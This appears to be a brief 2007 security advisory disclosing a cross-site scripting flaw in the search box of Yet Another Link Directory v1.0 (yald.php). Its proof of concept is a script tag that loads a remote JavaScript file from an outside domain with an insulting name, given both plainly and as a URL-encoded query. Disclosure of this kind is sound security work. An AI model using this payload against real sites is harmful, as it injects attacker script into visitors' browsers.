Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15616
HistoryJan 07, 2007 - 12:00 a.m.

Yet Another Link Directory v1.0

2007-01-0700:00:00
vulners.com
58

Yet Another Link Directory v1.0
http://yald.sourceforge.net/

Effected files:
yald.php


yald.php search box XSS

User input isn't sanatized before being generated. In the search box for a PoC put:
<script src=http://www.youfucktard.com/xss.js&gt;&lt;/script&gt;

url:
http://example.com/yald.php?search=&#37;3CSCRIPT+SRC&#37;3Dhttp&#37;3A&#37;2F&#37;2Fyoufucktard.com&#37;2Fxss.js&#37;3E&#37;3C&#37;2FSCRIPT&#37;3E

  • Luny